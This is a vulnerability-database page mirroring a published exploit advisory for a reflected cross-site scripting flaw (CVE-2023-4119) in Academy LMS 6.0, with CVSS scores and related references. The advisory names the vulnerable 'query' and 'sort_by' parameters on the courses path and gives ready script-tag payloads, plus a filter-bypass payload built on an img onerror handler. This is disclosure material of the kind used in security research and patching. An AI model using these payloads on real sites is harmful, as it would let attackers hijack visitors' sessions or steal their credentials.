Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdbCraCkErEDB-ID:51654
HistoryAug 04, 2023 - 12:00 a.m.

Academy LMS 6.0 - Reflected XSS

2023-08-0400:00:00
CraCkEr
www.exploit-db.com
176
reflected xss
academy lms
creativeitem
manipulation
cve-2023-4119
windows 10

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:L/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

46.7%

JSON
# Exploit Title: Academy LMS 6.0 - Reflected XSS
# Exploit Author: CraCkEr
# Date: 22/07/2023
# Vendor: Creativeitem
# Vendor Homepage: https://creativeitem.com/
# Software Link: https://demo.creativeitem.com/academy/
# Version: 6.0
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site
# CVE: CVE-2023-4119


## Greetings

The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob


## Description

The attacker can send to victim a link containing a malicious URL in an email or instant message
can perform a wide variety of actions, such as stealing the victim's session token or login credentials



Path: /academy/home/courses

GET parameter 'query' is vulnerable to XSS

https://website/academy/home/courses?query=[XSS]


Path: /academy/home/courses

GET parameter 'sort_by' is vulnerable to XSS

https://website/academy/home/courses?category=web-design&price=all&level=all&language=all&rating=all&sort_by=[XSS]


XSS Payloads (Blocked) :

<script>alert(1)</script>
ldt4d"><ScRiPt>alert(1)</ScRiPt>nuydd


XSS Payload Bypass Filter :

cplvz"><img src=a onerror=alert(1)>fk4ap



[-] Done

Related

prion 1
cvelist 1
cve 1
packetstorm 1
nvd 1
zdt 1
prion
prion
Cross site scripting
2023-08-03 09:15:00
cvelist
cvelist
CVE-2023-4119 Academy LMS courses cross site scripting
2023-08-03 08:31:03
cve
cve
CVE-2023-4119
2023-08-03 09:15:09
packetstorm
packetstorm
Academy LMS 6.0 Cross Site Scripting
2023-08-03 00:00:00
nvd
nvd
CVE-2023-4119
2023-08-03 09:15:09
zdt
zdt
Academy LMS 6.0 - Reflected XSS Vulnerability
2023-08-04 00:00:00

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:L/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

46.7%

JSON
Related for EDB-ID:51654
prion1cvelist1cve1packetstorm1nvd1zdt1